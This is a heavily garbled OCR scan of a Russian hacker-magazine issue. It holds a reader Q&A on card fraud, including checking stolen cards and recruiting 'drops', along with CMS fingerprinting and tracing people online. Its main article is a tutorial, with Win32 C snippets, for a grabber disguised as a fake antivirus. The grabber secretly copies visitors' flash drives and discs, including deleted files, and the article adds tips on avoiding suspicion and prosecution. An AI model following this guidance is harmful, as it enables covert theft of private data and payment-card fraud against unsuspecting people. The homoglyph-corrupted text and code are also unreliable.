Бресіаі, Вгідаба ОсНо, еВСѴѲ и БоѵѵЕеѵеІ. 

Щр://ОхсІеасІЬееЕіпЬ — детище Магсо ІѵаШі ака Паріог, эксперта и 

консультанта по информационной безопасности, разработчика 
ІІпіх-приложений, редактора и постоянного автора итальянского 
журнала І_іпих&С. Он же автор нескольких Іосаі гооі-эксплойтов 
для Иі п их Кегпеі 2.6.x. 

Ыір:/Ліу64.огд — сайт израильского хакера-программиста по имени Кгіс. 
Естьочень интересные материалы, например «Абѵапсеб ВиЛег 
ОѵеНІоѵѵМеіЬобз». 

ѵѵѵѵѵѵ.ѵх-біа.бе.ѵц — блогОіа — мембера ѵх-группы РЕБЕ. 

ШрѴ/зрасегодие.пеІ — персональная страничка Брасе Родие — всемирно 
известного журналиста, бывшего члена группы БОрЫ. 

Ы:1:р :// ге1:годосІ .а 11:егѵІ5І:а .огд — веб-блогдовольно известного хакера 
РдосГа, который в одиночку написал больше эксплойтов, чем 
многие элитные хак-тимы. 

ЩрѴ/дипіпзкі.сот — авторский проект одного из ведущих мировых 
зесигііу-специалистов — беогді Ѳипіпзкі. Именно он нашел 
огромное количество багов в разных осях (АІХ, Боіагіз, *В50), в 
продуктах МісгозоЛ (ІЕ, N0, ОиНоок, МБ ОГГісе) , веб-серверах (МБ 
N5, Боіиз Оотіпо, Огасіе), веб-приложениях (Ноітаіі) и стал соав- 
тором книги «Наск Ргообпд Ѵоиг ЫеБ/ѵогк — ІпІегпеіТгасІесгай». 

Ьир://касрег.ЬЫод.р[ — блог Касрег’а из ОеѵіІТеат. 

ШрЛ/ОхОООООО.сот — интереснейший блог, созданный Ропаіб ѵап беп 
Нееікатр ака .Іипдзопп и посвященный ѵѵеЬаррІісабоп зесигіБ/. 
Советую посетить. 



^0; В СЕТИ ПОСТОЯННО КИДАЮТ НА ЛАВЕ. КАК ЗАЩИТИТЬСЯ? 

В^А: Откидалова нельзя непосредственнозащититься, можно лишьста- 
раться вести себя так, чтобы не быть кинутым. Я уже неоднократно 
призывал делать покупки на закрытых форумах. Вряд л и кто-то 
будет там кидать на небольшие суммы, если сам доступ к форуму 
стоитпорядка 40ѴѴМ2. Чекай базы кидал, делай запросы ІСО-бо- 
там. Я предпочитаю работать через знакомых людей, с которыми 
уже проводились сделки, или брать контакты уже проверенных 
селлерову своих друзей. 

Заряди Гугл запросом вида «ІЧІСК+ВІаск», «Ы ІС К+ВІаск+ІСО: 1 23456» ит.д. 

уѵ ЗНАЮ, ЧТО САЙТ НАХОДИТСЯ НА ПАБЛ ИК-ДВИЖКЕ, НОНЕ 

МОГУ ОПРЕДЕЛИТЬ, ЧТО ЗА СМ5. ЕСТЬ КАКИЕ-ТО ПРИЕМЫ? 

Каки при обычном взломе, можно вызватьошибку в выполнении 
скриптов, использовать поисковик, искать стандартные дирек- 
тории вродеабтіп, рапеі, гооі ит.п. Какправило, именно втаких 
местах авторизации прописана строка с названием движка (неза- 
бываем, что названия директорий могутбыть прописаны в файле 
гоЬоіз.Ш]. Можно проводитьанализ вручную или использовать 
сканеры. Я предпочитаю сначала помучить Гугл запросами вроде 
«Роѵѵегеб Ьузкеіѵѵѵѵѵѵ.іагдеЕсопп», потом пропарсить сайт руками 
и только затем врубаю специальныеутилиты. 

Потом ведь всегда можно спросить название движка у владельца/созда- 
теля сайта, применив социальную инженерию. Обычно человек, 
создавший движок, оставляетсвой етаііна сайте. 

Далее, у большинства популярныхдвигов в корневой директории со 

скриптами всегда имеется файл вроде геабте.ЫіппІ, іпзІаІІ.ЫпгіІ 
ит.п. Какправило, это файлы с инструкциями поустановке, в 
которыхтакже прописаны название и версия движка. 

Можно попробовать выполнить один из скриптов движка. Например, у 
ѴѴогбРгезв в папке ѵѵр-іпсіибезлежит файл аиіЬог-іетрІаіе.рЬр 
(выбрал рандомно). Выполняем Ыірі/ЛагдеЕсопп/ѵѵр-іпсІибез/ 
аиіИог-іетрІаІе.рЬр; если вывалиласьошибка.то двигопределен. 



^0: ГДЕ УЗНАТЬ ПРО ТОЧКИ ДОСТУПА С БЕСПЛАТНЫМ ѴѴІ-РІ ИНЕ- 
ТОМ? МОЖЕТ, ЕСТЬ КАРТЫ? 

В^А: Конечно, существует проект, посвященный именно бесплатным и 
плохо защищенными точками доступа, суказанием их местопо- 
ложения в различных городах: ЬирѴЛгееѵѵіГ.ги . Причем проект 
не ограничивается Россией, а включает и многие другие страны. 
На сайте имеется удобный поиск по нужным критериям. Есть 
возможность самостоятельно добавлять новыеточки в базу 
проекта. 

Также можнозайти на ресурс, посвященный ѴѴі-ЕІ точкам Москвы: 
Шр://ѵѵагбгіѵег.ги . 



цѵ ТОЛЬКО ЧТО ПОДНЯЛ СЕРВАК, НО ПОКА ЧТО ВРЕМЕНИ НА 
НАСТРОЙКУ И ДОЛЖНОЕ ОБСЛУЖИВАНИЕ НЕТ, ПОЭТОМУ НУЖНЫ 
ПРОСТЕЙШИЕ РЕКОМЕНДАЦИИ ПО БЕЗОПАСНОСТИ, БЕЗ МОРОКИ И 
ПРОЧЕГО М03Г0Л0МСТВА. 

В^А: Для начало нужно определиться, как и для чего будет использоваться 
сервер: будет это сервакдля хостинга сайтов, таіі-сервер или 
что-то другое. Будем отталкиваться оттого, что мы хотим поднять 
веб-сервер для хостинга собственного сайта. 

С самого начала не стоит забывать про .Ыассезз, так как раскрытие 

листинга — одна из самых часто встречающихся ошибок. Дальше, 
я предпочитаютемжеакцессом поставить права доступа кдирек- 
ториям, файлам по ІР-адресу. 



► 052 
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Огсіег Бепу , АНом 
Бепу Сгот аіі 
АІІом Сгот уои_ір 
ОрЪіопз АН -Іпсіехез 

Включи 5АРЕ_М0БЕ, если есть возможность. 

Поставь простенькую Ю5 на основе скриптов. Могу предложить ОЕзесиге 
[ ЬирУ/сІІгесиге.сІатадеІаЬ.огд) и РНРІР5 (ШрУ/рЬр-ісІв.огд ). 

^0: КАК ЗАЩИТИТЬСЯ ОТ ІР-СПУФИНГА? 

І=з=А: Логично было бы вообще отказаться оттакого нестойкого вида 
авторизации. Ведь ІР-спуфинг — это, прежде всего, подделка 
ІР-адреса, необходимого для успешной аутентификации. Потом, 
безопасность может повысить грамотная настройка маршрутиза- 
тора — шифрование сессии будет весьма полезным. 

^0: ПОСМОТРЕЛ БЕСПЛАТНЫЕ СИСТЕМЫ ОБНАРУЖЕНИЯ ВТОР- 
ЖЕНИЙ, ХОЧЕТСЯ СРАВНИТЬ ИХ С ПЛАТНЫМИ АНАЛОГАМИ. ПОД- 
КИНЬ ПАРУ НАЗВАНИЙ. 

^А: Из наиболее известных это ѴѴіБепІгу (на моментнаписания статьи 
версия 4.2), имеющая базу событий. Загрузить демонстрацион- 
ную версию можно здесь: Шр://ѵѵітеІгіс5.сот/Ргобис1:5Л/ѴАРР%2 
0Ро\л/п[оаб%20Ведие5ЕЬ1т . 

Потом, АігРеіюпзе [ Ьир ://а і гсіебепзе. пе1:/ргосі исіз/іпсіех. рЬ р ) . существую- 
щая в нескольких версиях (персональная, корпоративная ит.п.). 
Она основана на сенсорах, размещенных на защищаемой площа- 
ди, которые передают данные на центральный сервер. 

Не знаю, стоитли советоватьтакой комплект, как НІ1;асЫ АігБосабоп, 

подходящий для большой корпоративной сети, но все же назову 
и его. Он состоит из управляющего сервера, станций, сервера, 
определяющего координаты, ѴѴЕАКІ-оборудования и про- 
граммного обеспечения. Определение координат стандартно 
— посылкой сигнала наточки и временем отклика. Стоит та кое 
чудо около $43 ООО. 

ЧТО ТАКОЕ ДРОП-ПРОЕКТЫ? 

^А: Для начала определимся с терминологией. Дроп — это человек, 

обналичивающий деньги с кредитных карт (кэш или вещевуха), ко- 
торые ему предоставляет кардер, и получающий за это определен- 
ны й п роцент. Та к ка к этот са м ы й п роцент может дости гать бол ыш их 
размеров и не исключена возможность кидка со стороны дропа, 
кардеру зачастую приходится применятьхитрую схему работы, и 
он создает в интернете сайт (дроп-проект) для вербовки граждан 
в свою мегакомпанию. Этот сайт рекламируется на разных досках 
объявлений и порталах с предложениями работы. Придумывается 
убедительная легенда, заключается двухсторонний договор (для 
большей убедительности), в котором прописаны такие пункты, как 
процент отвыполненной работы (какправило, это мизерный про- 
цент— около 4-7%) и санкции в случае невыполнения договора. 

Таким образом ничего не подозревающий человек становится звеном в 
цепочке махинаций с кредитками. 

^0: Я ХОЧУ НАПИСАТЬ ПРОГУ ДЛЯ УДАЛЕННОГО АДМИНИСТРИРО- 
ВАНИЯ. ДАЙ, ПОЖАЛУЙСТА, ССЫЛКИ (ЖЕЛАТЕЛЬНО ДЛЯ ОЕЬРНІ, 



НО МОЖНО И ОБЩИЕ ПРИНЦИПЫ НАПИСАНИЯ ПОДОБНЫХ 
ПРОГРАММ). 

^А: В майском номере журнала была статья по написанию системы 

удаленного администрирования. Думаю, сейчас номер доступен 
на сайте журнала. 

ВоЧ^ ПОДСКАЖИТЕ КАКОЙ-НИБУДЬ РАБОТАЮЩИЙ ГЕНЕРАТОР 
НОМЕРОВ/КАРТ ѴѴЕВМОЫЕѴ ИЛИ ДРУГОЙ СПОСОБ ИХ ПОЛУЧЕНИЯ, 
ВОЗМОЖНЫЙ ИЗ-ЗАТЕХ ИЛИ ИНЫХ НЕДОРАБОТОК. 

І=з=А: Наличие работающего генератора поставило бы крест на платежной 
системе. Создание генератора картѴѴеЬМопеу (и других платежных 
систем) невозможно в принципе, таккакмежду номером и паролем 
нетсвязи (они просто хранятся в базе данных платежной системы, 
и, скорее всего, даже там они взашифрованном виде).Такчто не 
ведись на предложения откидал по поводу покупки такого стаффа. 

(ф КАК ПРОБИТЬ ИНФОРМАЦИЮ О ЧЕЛОВЕКЕ ЧЕРЕЗ ИНТЕРНЕТ? 
ЕСТЬ ЛИ АЛЬТЕРНАТИВА ИСПОЛЬЗОВАНИЮ БАЗ ДАННЫХ? 

^А: В интернете существуют бес платные сер висы вроде «Забей телефон 
— получи Ф.И.О.» и наоборот, но информация в базахтаких сер- 
висов крайне редко обновляется и в большинстве случаев неак- 
туальна. Многое зависит оттого, что мы знаем о человеке. Если 
один лишь ник, то снабжаем поисковики запросами «Профиль 
пользователя+І\ІІСКМАМЕ»ит.п. Имея ІР-адрес человека, пробиваем 
его в ѴѴЬоіз’е, узнаем местонахождение, провайдера ит.п. Авот что 
делать дальше — это уже большой вопрос, посколькуни один уважаю- 
щий себя провайдер, естественно, информацию о своих клиентахтебе 
недаст:). Сейчас естьлюди, пробивающие подобную инфу за деньги, 
но, какпоказываетопытобщения стакими пробивщиками, онитакже 
тупо юзают поисковики и имеющиеся базы (а вообще, читай июньскую 
статью про анонимность в сети от РОісГа — примечание РогЬ'а). 

цѵ СОВСЕМ НЕДАВНО ВЛИЛСЯ В КАРДИНГ-ТЕМУ, И ВОЗНИК ВОП- 
РОС: КАК Ч ЕКНУТЬ КРЕДУ НА ВАЛ ИД? 

І=>А: Идешь и налишь :). На самом деле для этого существуют различные 
сервисы, биллинги ( ЫірѴ/аиіЬогіге.пеі . к примеру). Банку посы- 
лается запрос, на который приходит ответ: естьлаве на карте или 
все по нулям. За такую проверку приходится отбашлять неболь- 
шой процент. 

Можно предложить еще один, по правде говоря, глупый вариант: регис- 
трацию на сайте, требующем указания данных СС (думаю, ты 
понял, что речь идетоХХХ-порталах :)). 

Насколько я знаю, существуют биллинги, не берущие комиссию при про- 
верке карты, но информация о нихза крыта ;). 

Кстати, совсем недавно вышел скрипт для чека СС от команды Субегіо гсіз, 
использующий один из сервисов, снимающих деньги. 

^0: СУЩЕСТВУЮТ Л И БРУТФОРСЕРЫ ПАРОЛЕЙ, ОПТИМИЗИРО- 
ВАННЫЕ ДЛЯ РАБОТЫ НА ДВУХЪЯДЕРНЫХ ПРОЦЕССОРАХ? 

^А: По крайней мере я таких б рутов не встречал. Для АМСшных 
камней существует программа Оиаі-Соге Оріітігег, по 
словам разработчиков, реализующая внутренний потенциал 
мощностей проца в большинстве приложений. Бери, 
экспериментируй. □□ 
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Тыбрим данные с ДазЬ-модулей и Сй/ОѴО 

Как сграбить содержимое флешек и СО / ОѴЮ-носителей (включая удаленные файлы), не нару- 
шив ни один пункт закона и оставшись непойманным, неразоблаченным и непобитым? Я, поку- 
рив хорошей травы, разработал специальную технологию, описание которой и предлагаю всем 
желающим. 



одяттут всякие! Спать, понимаешь, мешают. Зашел ко мне 
давеча в нору одинтакойтип. Флешку припер. Сует ее в 
разъем. Скопировать последний альбом Іпсіерепсіепіу меня 
хочет. А там у него, на флешке, сорцы интересные, конфи- 
денциальная документация и фотки пикантные интимного характера с 
его пассией в главной роли. Знакомая ситуация, нетак ли? И этот кадр 
думает, что если ни на секунду не выпускать свою малышку из рук, то никто 
у него ничего не сопрет. Наивный! Я озаботился этой проблемой еще во 
времена МЗ-БОЗ, когда программистам приходилосьтаскатьза собой 
потрепанную папочку с дискетами пятидюймового форм-фактора, что 
придавало им сходства с инженерами (которыми они, по сути, и являлись, 
поскольку пользователей тогда еще не существовало). 

Стех пор многое изменилось. Народ перешел на 2ІР'ы, СБ/БѴБ, флешки 



и прочие носители, вмещающие гигабайты полезных данных, которыми 
некоторые скряги упорно не хотят делиться, забыв главный девиз хакера, 
гласящий, что код и данные — общенародное достояние. Ну не хотят 
делиться — и хрен с ними! Мы и сами возьмем! По этому поводуя говорю: 
«Что на мой компьютер попало, то пропало». Хочешь сохранить свои 
данные втайне — так не суй флеш куда попало! 

Обзор существующих утилит, или как палятся хакеры 

Беглый поиск в интернете выявил множество программ, предназначен- 
ных для скрытного копирования данных со съемных носителей: от готовых 
к применению приложений до исходных текстов, реализующих ядерные 
функции, легко встраиваемые в наши собственные проекты. 

Ксожалению, практически все они неработоспособны. Причем речь 
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идет не о мелких ошибках реализации, а о глобальных конструктивных 
просчетах. Начнем стого, что многие грабберы ныкаютсвои процессы от 
диспетчера задач и другихутилит подобного типа, перехватывая ряд сис- 
темных функций и не вполне корректно их обрабатывая. Все это приводит 
к многочисленным конфликтам и сбоям операционной системы. Зачем 
прятать процессы на своей собственной машине — мне непонятно. Если 
грабберустанавливается сознательно (а это как раз и есть та ситуация, о 
которой мы говорим), он может ныкаться какугодно — я все равно знаю, 
что он есть. Посторонним же пользователям список процессов на моем 
компьютере ровным счетом ни о чем не говорит, да и не позволю я им 
ковыряться в недрах моей машины! 

Но это все — ладно! Прячут процессы — ну и хрен с ними! В конце концов, 
это никому не мешает (то есть еще как мешает: антивирусы ругаются так, 
что уши вянут, и приходится отключать кучу проактивныхтехнологий и 
эвристическиханализаторов, рискуя подцепить заразу). 

Хуже всего, что некоторые (самые простые) грабберы начинают стягивать 
данные сразу же после установки флешки и/или лазерного диска. Если 
флешка оснащена индикатором, то при обращении к ней он начинает 
зловеще мигать, а лазерные диски нетолько мигают, но еще и шумят, 
вызывая ужертвы вполне очевидные подозрения, и незадачливый хакер 
тут же получает по башке (так что всетяжелые предметы лучше заблаго- 
временноубратьза пределы видимости). 

Грабберы классом выше отслеживают момент первого обращения к 
съемному носителю и стягивают да иные только во время «легальных» 
операций чтения/записи. Очевидным минусом этой технологии стано- 
вится резко возросшая сложность реализации, требующая перехвата 
системных функций, который в Висте и 64-битных версияхХР нето чтобы 
совсем невозможен, но существенно затруднен. Опять-таки антивирусы, 
глюки и прочие никому не нужные вещи. До сих пор мне не встречался 
ни один добротный перехватчик, корректно работающий на многопро- 
цессорных машинах (включая І\ІТ и многоядерные процессоры, которых с 
каждым днем становится все больше и больше). 

Недостаток второй и самый главный — емкость флешки (СО/ОѴО-дисков), 
как правило, намного больше размера легально копируемых файлов, и 
утянуть их содержимое просто так не получится. Времени уйдет целая 
куча. Даже если флешка не оснащена индикатором, будет мигать и нд и ка- 
торжесткого диска. А куда еще складывать такое количество награблен- 
ных данных? Не в память же! Хотя, вообще-то, можно и в память, только 



» 




памяти должно быть много. Но сложности на этом незаканчиваются. При 
попытке отключения ІІЗВ-устройства штатными средствами ѴѴІпсІоѵѵв, 
та просто откажется демонтировать флешку, пока с ней работаетхотя бы 
одна программа. Следовательно, граббер должен отслеживать отклю- 
чение II 5 В -устройств, прекращая грабеж в аварийном режиме. Короче, 
весьма нехилый проекту нас получается. Реализовать его оченьсложно. 
Отладить — еще сложнее, а утащить информацию, не вызывая подозре- 
ний у ее владельца, — вообще невозможно. 

По этому поводу говорят, что если нельзя, но очень сильно хочется, то 
все-таки можно! И сейчас я поделюсь рецептом программы, которую 
можно состряпать за пару вечеров и которая работает на любой, абсо- 
лютнолюбой, операционной системе: на 9х, ІЧТ, ѴѴ2К.ХР, Висте и даже на 
Ыпих/ВЗО, поддерживает все типы сменных носителей и не вызывает 
конфликтов. А самое главное — распознать факт грабежа не сможет даже 
продвинутый пользователь. А грабить, скажу я тебе, мы будем его подчис- 
тую: от первого до последнего байта, включая данные, принадлежащие 
удаленным файлам. 

Основные идеи и концепции (не путать с контрацепцией) 

Из канонов разведки известно, что лучше всех ныкается тот, кто не 
прячась играет в открытую. Применительно к нашей ситуации — не 
пытайся скрыть факт грабежа данных, а сделай его явным. И это не 
шутка. Труднее всего обнаружитьто, что находится у нас под глазами. 
Берем флеш (или СВ/ОѴО), вставляем. Тут же всплывает«антивирус», 
имитирующий проверку файлов, а в действительности сливающий их 
на жесткий диск в какую-нибудь глубоко вложенную папку — такую, 
которая гарантированно не попадется жертве на глаза. Необходимость 
отслеживать обращения к съемным устройствам тут же отпадает. Мы 
и без всякой маскировки так замаскировались, что ужертвы и тени 
подозрений не возникает! 

Поскольку обычные антивирусы так себя не ведут, то от копирования 
их интерфейса лучше воздержаться, иначе можно быстро погореть. 

Пусть это будет что-то совершенно никому не известное. Например, 
суперкрутой антивирус под названием Зеіепа Епіегргіве ЕбШоп. Чисто 
теоретически жертва может попросить нас прервать проверку флешки 
(С0/0Ѵ0), нотут ее легко обломать встречным вопросом: «С какого это 
такого перепугу мы должны чего-то прерывать?Уж не вируса, ты, милый 
человек, занести нам хочешь?» 
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Поэтому повторяю еще раз: написание и использование 
грабберов — еще не преступление. Преступлением все 
это становится тогда, когда мы начинаем распространять 
награбленное добро без ведома и против воли его правооб- 
ладателя. На этой возвышенной ноте мы закончим с отвле- 
ченными понятиями и концепциями и перейдем к насущным 
проблемам, которых будет много. 

Технические детали реализации 

В состав ѵѵіп32 АРІ входит любопытная функция РіпбРігзіСЬа 
пдеІМоШісабоп, генерирующая уведомления при изменении 
содержимого заданной директории. Достаточно передать 
ей букву оптического привода и можно отслеживать вставку 
новых СО/ОѴО-дисков. Если у нас имеется более одного 
привода, функция РіпбРігвЮЬапдеЫоббсабоп должна вызы- 
ваться персонально для каждого из них. 

ПРИМЕР ИСПОЛЬЗОВАНИЯ ФУНКЦИИ РШ0РІР5ТСНАМ6 
Е N ОТ I Р I С АТ I О N ДЛЯ ОТСЛЕЖИВАНИЯ ВСТАВКИ НОВЫХ 
ОПТИЧЕСКИХ ДИСКОВ В ПРИВОД 

/ / передаем функции имя буквы привода 
// оптических дисков (в данном случае это 
// диск «С: \ \») 

НіШБЬЕ спЪ. = РіпбРігзбСйапдеЫобібісабіоп ( 

"С: \\" , РАЬЗР , 

Р I ЬР_ЫОТ I РУ_СН А№ЗР_Р I ЬР_ЫАМР | 
РІРЕ_ШТІРУ_СНАШЕ_БІК_ЫАМР) ; 




> Ипкз 

Все исходные тексты 
моей программы 
находятся на сервере 
ЙрѴ/пегиті.огд.ги . 



Кстати говоря, с юридическойточки зрения мы не совершаем 
никакого преступления, так как вправе копировать содер- 
жимое сменного носителя, добровольно вставленного в наш 
компьютер его правообладателем. Зачем копировать? Ну, 
например, в целях кэширования. Другой вопрос, что распро- 
странять полученную таким путем информацию без согласия 
правообладателя как бы нельзя. «Как бы» — потому что факт 
несанкционированного распространения еще необходимо 
доказать. Если речь идет не о документах, представляющих 
коммерческую или государственную тайну, и не обубытках в 
особо крупных размерах, никакой суд заниматься подоб- 
ными мелочами просто не будет. Такие вещи недоказуемы в 
принципе! Вотупрется хакер рогом и будет гнуть линию, что 
согласие (устное] на дистрибуцию он получил. Кто не верит, 
пускай докажет, что его (согласия) не было, причем сучетом 
презумпции невиновности, которую еще никто не отменял. 
Впрочем, мы ушли в перпендикуляр. Возвращаясь в смысло- 
вую плоскость обсуждаемой темы, обратим свое внимание на 
то замечательное обстоятельство, что сами по себе грабберы 
не могутбыть законными или незаконными. Даже если они 
умышленно имитируют работу антивируса. Ну и что стого? 
Кого они этим вводят в заблуждение? Пользователя граббе- 
ра? Ни фига подобного, ведь в прилагаемой к нему докумен- 
тации все сказано. Владельца флешки или СВ/ОѴО? Ну... так 
это он сам себя обманул. Мало ли что емутам почудилось на 
экране. Зеіепа — это вполне нормальный антивирус, точнее, 
часть анти вирусного комплекса, копирующая данные с внеш- 
них носителей в специальную папку, чтобы при обнаружении 
заразы можно былоустановить ее источник. 



/ / отслеживаем изменения в бесконечном цикле 
// (тут необходимо добавить код для выхода из 
// цикла по <Рзс> или другому хоткею 
ѵйіііе (1) 

{ 

/ / ждем изменений в файловой системе 
// заданного диска или, более конкретно, 
// вставки (нового) диска в привод 
БШЕБ ыг = ШаібРогЗіпдІеОЬоесб ( 

СпЬ, ШРШІТР) ; 

/ / если мы находимся здесь , 

//в привод вставлен новый диск 
//и самое время его ограбить 

} 

/ / после выхода из цикла сообщаем системе , 

/ / что мы больше не хотим получать никаких 
// уведомлений 

РіпбСІозеСйапдеЫобібісабіоп (спй) ; 

Получать уведомлен ия о вставке флешек, автомати- 
чески монтирующих себя на новые диски, несколько 
сложнее. Мнетаки не удалось найти элегантный и 
документированный способ, поддерживаемый всеми 
системами семейства ѴѴІпсіоѵѵб. Но я к этому, по правде 
сказать, не особенно и стремился, ограничившись 
периодическим (раз в несколько секунд) вызовом А Р I - 
функции ОиегуОозОеѵісе, возвращающим список име- 
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«Утянуть удаленное содержимое с носителей СО/йѴО-К/КѴѴ на порядок сложнее, и, чтобы 
добраться до захороненных данных, необходимо спуститься на один уровень вглубь, полу- 
чив прямой доступ к приводу через интерфейс А5РІ или 5РТІ > 



ющихся дисков, или 0еІІ_одісаШгіѵе5, которая работает быстрее 
и реализована на всех платформах, а нетолько на линейке N Т, но 
вместо букв возвращает битовую маску (с которой еще предстоит 
разобраться). 

Сделать это можно, например, так: 

ПРИМЕР ИСПОЛЬЗОВАНИЯ ФУНКЦИИ 0ЕТІ_00ІСАІ_0ШѴЕ5 

/ / получаем битовую маску с перечнем дисков , 

/ / смонтированных на соответствующую им букву 
БѴЮКЮ бѵтбодісаІБгіѵез = СеббодісаІБгіѵез () ; 

// разбираем все биты один за другим 
Тог ( пБгіѵе = 0; пБгіѵе<32; пБгіѵе++ ) 

{ 

//такой диск существует? 

ІТ ( бмЬодісаІБгіѵез & (1 « пБгіѵе) ) 

{ 

/ / определяем характеристики диска 
иТуре = СеТБгіѵеТуре (ззВиТТег) ; 

ІТ ( (иТуре == БКІѴЕ_КЕМОѴАВбЕ) | | 

(иТуре == ВКІѴЕ_СБВОМ) ) 

{ 

/ / это наш клиент ! ! ! 

/ / грабим его по полной программе 

} 

} 

} 

Падение производительности настолько несущественно, что о нем не 
стоит и говорить. В принципе в ѴѴ2К (и более поздних версиях) существует 
возможность насильственного монтирования флешки не на диск, а в 
поддиректорию, которую уже можно скормить функции ЕіпсІЕІгвіСЬапдеМ 
оШісабоп, ноэто уже никому не нужное извращение. 

Грабить файлы лучше всего не блочно (функциями ПеабРІІе/ѴѴгііеРІІе), 
а через СоруРІІеЕх — это проще и более производительно. В остальном 
грабеж реализуется вполне стандартно и не должен вызывать слож- 
ностей даже у начинающих программистов, терзающих Ѵівиаі Вавіс 
или 0ЕІ_РНІ. 

Грабим удаленные файлы 

Флешки, используемые для обмена данными между компьютерами, 
несут на своем борту много интересного. Конечно, стечением времени 
шансы на восстановление удаленного файла стремительно умень- 
шаются, и в какой-то моментон оказывается полностью перезаписан 
свежими данными, однако если флешка была заполнена до отказа, а 
затем отформатирована, то вновь записываемые файлы затрут старые 
очень нескоро (особенно если объем флешки измеряется гигабайтами). 
В общем, покопавшись в мусорной куче, мы с ненулевой вероятностью 
найдем что-то очень интересное — такое, чего другим путем раздобыть 



просто нельзя. Нутак чего же мы ждем, почему стоим... то есть сидим? 
Когда нужно открывать документацию и кодить, кодить, кодить... 
Естественно, стратегию грабежа придется радикально изменить, раз- 
вернув ее на 360 градусов. Передаем АРІ-функции СгеаіеРІІе имя диска 
в виде«\\\\.\\П:», где Р — буква, ассоциированная с флешкой, и читаем 
содержимое устройства функцией ПеасІРіІе блоками, кратными размеру 
сектора, например по 2048 байт (внимание: процесс- граббер в обяза- 
тельном порядке должен обладать правами администратора, которые 
ему можно делегировать, к примеру, через штатную утилиту гипав, иначе 
ничего не получится). 

Минимально работающий листинг, реализующий эту затею, выглядит 
так (полный исходный текст можно найти в книге «Техника защиты Сй от 
копирования»): 

ФРАГМЕНТ ПРОГРАММЫ, ЧИТАЮЩИЙ ОБРАЗЫ ФЛЕШЕК И СО/ОУО- 
ДИСКОВ 

таіп(іпТ агдс , сбаг **агдѵ) 

{ 

іпТ а; ЕІЬЕ *Т; НАШ6Е Ь; 
сбаг *ЪиТ; 

ШОКБ х_геаб; 
сбаг ЪиТ_п [ 1024 ] ; 

ЪиТ = та11ос(2048) ; //выделяем память 

// открываем устройство (в данном случае диск С: ) 
Ъ=СгеабеЕі1е ( " \ \\ \ Л \С: " , СЕЕЕЕІС_ЕЕАБ, 

ЕІЬЕ_ЗНАЕЕ_ЕЕАБ , 0 , ОРЕЫ_ЕХІ5ТІШ ,0,0); 

//позиционируем указатель на первый читаемый блок 
ЗебЕіІеРоіпбег (Ь, 0, ШЬЬ, ЕІЬЕ_ВЕОШ) ; 

//читаем блоки с нулевого по 666-й 
Тог (а = 0; а <= 6 66; а++) 

{ 

//читаем очередной блок 

ІТ (КеабЕіІе (Ь, ЬиТ, 2048, &х_геаб, N1166) && 
х_геаб) 

{ 

/ / записываем только что считанный 
// блок в файл С: ХдгаЬ.баб 
зргіпбТ (ЬиТ_п, " %з [%04б] . баб " , 

"С : \ \ дгаЬ . баб ", а ) ; 
іб (Т = Тореп(ЬиТ_п, "ѵ^Ь" ) ) 

{ 

Тѵлгібе (биТ , 1, х_геаб, Т) ; 

Тсіозе ( Т) ; 

} 

} 
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керу нужны нетолько мозги, но и длинные ноги, чтобы 
петь смотаться, пока его не защемили 



Полученный образ флешки можно впоследствии залить на свою собс- 
твенную флешку, поменяв функцию РеабЕіІе на ѴѴгіІеРІІе, после чего 
натравить на нее любую из многочисленныхутилит, предназначенных 
для восстановления удаленных файлов, или (если флешки такого объема 
у нас нет) запустить Ыпих/ВЗО, смонтировать образ как настоящий диск и 
восстановить файлы вручную с помощью Ьех-редактора. 

Техника восстановления подробно описана в моей книге «Оаіа Весоѵегу 
— Іірз апб зоІіЛіопз», русская редакция которой лежит на ЫТрУ/пегиті. 
огд.ги . а недавно по просьбе читателей выложен архив прилагаемого к 
ней лазерного диска со всеми исходными текстами простейших программ 
для восстановления. 

Утянуть удаленное содержимое с носителей С0/0Ѵ0-Р/РѴѴ на порядок 
сложнее, и, чтобы добраться до захороненных данных, необходимо спус- 
титься на один уровень вглубь, получив прямой доступ к приводу через 
интерфейс А5РІ или 5РТІ. Оба подробно описаны в «Технике защиты Сй от 
копирования». Там же рассказывается, как самостоятельно восстановить 
данные после быстрой очистки. Полная очистка, увы, гробитсодержимое 
С0/0Ѵ0-РѴѴ безвозвратно, однако она применяется лишь некоторыми 
пользователями. 

Какие ограбить самого себя 

Чтобы не вызватьужертвы никаких подозрений, граббер следует де ржать 
на своем компьютере постояннозапущенным (например, закинутым 
в автозагрузку или в один из многочисленных ключей автозапуска, 
находящихся в системном реестре). Любые дополнительные действия, 
выполняемые нами перед вставкой чужой флешки или лазерного диска, 
выглядят довольно странными и не вполне адекватными. Вообще-то, 
можно, конечно, прикинуться параноиком, типа вот меня давеча поимели, 
так что теперь любой носитель в обязательном порядке проходитжесткий 
бактериологический контроль «антивирусом». Но если жертва думает 
головой, она быстро раскусит, что это за контрольтакой, и начнет щемить 
хакера по полной программе, особенно после обнаружения интимных 
фотографий своей пассии на диких просторах интернета. 

Короче, лучше держать «антивирус» постоянно активным. Только это же 
ведь напряг сплошной! Не успел еще вставить новый диск (свой диск, а 
не чужой), какуже вовсю пошел грабеж, отнимающий время и убивающий 
нервные клетки. Значит, будем хитрить (тем более что нам это не впервой). 
«Антивирус» должен позволять быстро отменять проверкутекущего 
диска нажатием <Езс>, <АІТ-Х> или любой другой привычной комбинации 
клавиш, запоминая его серийный номер в скрытом конфигурационном 
файле, и никогда большеего не проверять. Другими словами, необходимо 
добавить в граббер поддержку «белого» списка своих дисков, опознавае- 
мых по серийному номеру или метке тома. Однако метка — довольно нена- 
дежное средство. Например, Ыего по умолчанию метит все прожигаемые 
им диски ключевым словом N ЕѴѴ, а при форматировании флешек и ЕІР'ов 
метка обычно вообще не назначается. 

Серийный номер, хранящийся в ЬооМсекторе.тоже не слишкомуникаль- 
ная характеристика, но для нашей целей лучшего средства, пожалуй, и не 
найти (остальные либотребуют низкоуровневого доступа к устройству, либо 
тратят на извлечениеуникальныххарактеристик носителя кучу времени). 

За чтение серийного номера отвечает АРІ-функция ЗеіРіІеІпІогтабопВу 
НапсИе, возвращающая его в следующей структуре: 



СЕРИЙНЫЙ НОМЕР ДИСКА, ВОЗВРАЩАЕМЫЙ ФУНКЦИЕЙ 6ЕТРИЕІ 
МРОРМАТІОМВѴНАМОІ.Е 



Суресіеб зСгисС 


НЗУ_НАШЬЕ_РІЬЕ_ШРОКМАТІОМ { 


ШОІЮ 


сІмЕіІеАЬЬгіЪиЬез ; 


ЕІЬЕТІМЕ 


ІЬСгеаЬіопТіше; 


ЕІЬЕТІМЕ 


ІЬЬазЬАссеззТіте; 


